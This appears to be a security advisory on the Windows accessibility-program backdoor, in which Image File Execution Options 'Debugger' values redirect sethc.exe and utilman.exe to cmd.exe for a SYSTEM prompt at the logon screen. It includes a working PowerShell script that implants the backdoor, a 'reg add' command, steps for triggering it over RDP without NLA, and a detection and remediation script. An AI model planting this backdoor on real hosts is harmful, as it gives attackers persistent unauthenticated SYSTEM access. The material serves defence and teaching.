The Windows Sticky Keys (sethc.exe) and Utility Manager (utilman.exe) accessibility programs can be launched from the logon screen, before any user has authenticated, and Windows consults a per-executable registry entry (the 'Debugger' value under Image File Execution Options) that tells the loader to run a different program in their place. By pointing those registry values at cmd.exe (the older variant of the same backdoor overwrites the binaries themselves with a copy of cmd.exe), an attacker turns the accessibility shortcuts into a backdoor: pressing Shift five times (Sticky Keys) or Win+U (Utility Manager) on the logon screen spawns a command prompt running as SYSTEM. When Remote Desktop Protocol (RDP) is enabled on the target host and Network Level Authentication (NLA) is not enforced, an attacker can open an RDP connection to the logon screen without any credentials and trigger the shortcut there, obtaining a remote command prompt on the host.
- The attacker compromises the Windows host, obtaining shell access with at least administrator privilege.
- The attacker uses 'REG' commands to set an Image File Execution Options 'Debugger' value for sethc.exe and/or utilman.exe that points at cmd.exe, so that Windows launches cmd.exe whenever either accessibility program is invoked. The attacker can then call cmd.exe through the built-in Windows shortcuts, including remotely and before authentication through Remote Desktop Services when the RDP logon screen is reachable.
- Prerequisite for implanting the backdoor: the attacker can write the registry values (via the 'REG' command or equivalent), which requires administrator privilege on the host.
- Prerequisite for triggering the backdoor: the attacker can reach an interactive session on the target host (the RDP logon screen, the console, or another remote graphical session) and the 'Sticky Keys' and 'Utility Manager' shortcuts are not disabled by Group Policy. With RDP, triggering before authentication additionally requires that Network Level Authentication is not enforced, since NLA authenticates the user before the logon screen is ever displayed.
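The procedure above, reproduced as an added lab example that is not code from the original advisory: it implants the backdoor by writing the Image File Execution Options 'Debugger' value that the attacker's REG commands set, verifies the result, and removes it again. The function names, the -Action parameter and the script filename in the usage note are this example's own; the registry location is the standard IFEO key. Run it only on a disposable Windows VM, from an elevated PowerShell session.

```powershell
# Added lab example (not part of the original advisory): implant, verify and remove
# the Sticky Keys / Utility Manager backdoor described above.
# Function names and the -Action switch are this example's own; the registry
# location is the standard Image File Execution Options (IFEO) key.
#Requires -RunAsAdministrator
param([ValidateSet('Install', 'Test', 'Remove')][string]$Action = 'Test')

$IfeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$Targets  = @('sethc.exe', 'utilman.exe')
$Payload  = Join-Path $env:SystemRoot 'System32\cmd.exe'

function Install-AccessibilityBackdoor {
    # Equivalent of the attacker's REG command, e.g.
    #   reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
    #       /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f
    foreach ($exe in $Targets) {
        $key = Join-Path $IfeoRoot $exe
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        # Windows launches the program named in Debugger instead of $exe.
        Set-ItemProperty -Path $key -Name Debugger -Value $Payload -Type String
    }
}

function Test-AccessibilityBackdoor {
    foreach ($exe in $Targets) {
        $key = Join-Path $IfeoRoot $exe
        $dbg = (Get-ItemProperty -Path $key -Name Debugger -ErrorAction SilentlyContinue).Debugger
        [pscustomobject]@{ Binary = $exe; Debugger = $dbg; Backdoored = [bool]$dbg }
    }
}

function Remove-AccessibilityBackdoor {
    foreach ($exe in $Targets) {
        $key = Join-Path $IfeoRoot $exe
        if (-not (Test-Path $key)) { continue }
        Remove-ItemProperty -Path $key -Name Debugger -ErrorAction SilentlyContinue
        # Drop the per-executable key if nothing else lives under it.
        $k = Get-Item -Path $key
        if ($k.ValueCount -eq 0 -and $k.SubKeyCount -eq 0) { Remove-Item -Path $key }
    }
}

switch ($Action) {
    'Install' { Install-AccessibilityBackdoor }
    'Remove'  { Remove-AccessibilityBackdoor }
}
# Show the current state for every action so the change is visible.
Test-AccessibilityBackdoor | Format-Table -AutoSize
```

Usage (filename is hypothetical): `.\sethc-backdoor-lab.ps1 -Action Install`, then lock the VM or connect to it over RDP with NLA disabled and press Shift five times (or Win+U) at the logon screen; a cmd.exe running as SYSTEM appears instead of the accessibility program. `.\sethc-backdoor-lab.ps1 -Action Remove` puts the keys back.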
Alert Logic Coverage
Alert Logic® has evaluated its customer base for exposure to this technique and has developed signatures for detecting and mitigating the threat, depending on the security service in place.
Detection of this threat is provided via the Alert Logic ActiveWatch for Log Manager™ service. The affected system produces log messages when a backdoor of this type is implanted or triggered; an incident is generated in the Alert Logic console when these log messages are observed.
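A host-side audit that a responder can run independently of the log-based detection described above, as an added example that is not Alert Logic's signature logic and not code from the original advisory. It checks the IFEO 'Debugger' values, compares each accessibility binary on disk against cmd.exe (this only catches a straight copy of cmd.exe, not an arbitrary payload), reports whether RDP exposes the logon screen without NLA, and looks for Security-log registry-modification events touching the IFEO keys. The binaries beyond sethc.exe and utilman.exe, the -Remediate switch and the function names are this example's own additions.

```powershell
# Added example (not Alert Logic's signature logic, not code from the original advisory):
# audit a Windows host for the accessibility-binary backdoor.
# (a) IFEO 'Debugger' hijacks, (b) binaries replaced with cmd.exe, (c) RDP/NLA state,
# (d) Security event 4657 entries that name the IFEO keys. Targets beyond
# sethc.exe/utilman.exe and the -Remediate switch are this example's own additions.
#Requires -RunAsAdministrator
param([switch]$Remediate)

$IfeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$System32 = Join-Path $env:SystemRoot 'System32'
# Accessibility programs launchable from the logon screen; the advisory names the first two.
$Targets  = 'sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe', 'magnify.exe', 'displayswitch.exe'
$CmdHash  = (Get-FileHash -Path (Join-Path $System32 'cmd.exe') -Algorithm SHA256).Hash

function Get-AccessibilityBackdoorFinding {
    foreach ($exe in $Targets) {
        # (a) IFEO: a Debugger value makes Windows run that program instead of $exe.
        $key = Join-Path $IfeoRoot $exe
        $dbg = (Get-ItemProperty -Path $key -Name Debugger -ErrorAction SilentlyContinue).Debugger
        if ($dbg) {
            [pscustomobject]@{ Binary = $exe; Technique = 'IFEO Debugger'; Detail = $dbg; Key = $key }
        }
        # (b) On-disk replacement: the accessibility binary is byte-identical to cmd.exe.
        $path = Join-Path $System32 $exe
        if ((Test-Path $path) -and (Get-FileHash -Path $path -Algorithm SHA256).Hash -eq $CmdHash) {
            [pscustomobject]@{ Binary = $exe; Technique = 'File replaced with cmd.exe'; Detail = $path; Key = $null }
        }
    }
}

function Get-RdpExposure {
    $ts  = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -ErrorAction SilentlyContinue
    $rdp = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -ErrorAction SilentlyContinue
    [pscustomobject]@{
        RdpEnabled  = ($ts.fDenyTSConnections -eq 0)
        NlaRequired = ($rdp.UserAuthentication -eq 1)
        # The pre-authentication trigger described in the advisory needs RDP on and NLA off.
        PreAuthTriggerPossible = ($ts.fDenyTSConnections -eq 0 -and $rdp.UserAuthentication -ne 1)
    }
}

function Get-IfeoRegistryAuditEvent {
    # Event 4657 (registry value modified) is only written when 'Audit Registry' is enabled
    # and the IFEO key carries a SACL; no events does not mean no tampering.
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4657 } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'Image File Execution Options\\(sethc|utilman|osk|narrator|magnify|displayswitch)\.exe' } |
        Select-Object TimeCreated, Id, @{ n = 'Summary'; e = { ($_.Message -split "`n")[0] } }
}

$findings = @(Get-AccessibilityBackdoorFinding)
if ($findings) { $findings | Format-Table -AutoSize } else { 'No accessibility backdoor found.' }
Get-RdpExposure | Format-List
Get-IfeoRegistryAuditEvent | Format-Table -AutoSize

if ($Remediate) {
    foreach ($f in ($findings | Where-Object Key)) {
        Remove-ItemProperty -Path $f.Key -Name Debugger   # drop the IFEO hijack
    }
    if ($findings | Where-Object { -not $_.Key }) {
        # Replaced binaries should be restored from the component store, not patched by hand.
        'Run "sfc /scannow" to restore the replaced accessibility binaries.'
    }
}
```

Run it from an elevated prompt on the suspect host; add `-Remediate` to remove any Debugger values it finds. If `PreAuthTriggerPossible` is true, the host will show its logon screen to any unauthenticated RDP client, which is the condition the pre-authentication trigger above relies on.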
Recommendations for Mitigation
The attacker must already have gained administrator access to the host through some other entry vector, so this backdoor is a persistence mechanism rather than an initial compromise. Ensure that all software on internet-facing hosts is up to date. In addition, require Network Level Authentication for RDP so that the logon screen is not exposed to unauthenticated connections, and periodically audit the Image File Execution Options registry keys and the accessibility binaries in System32 for tampering.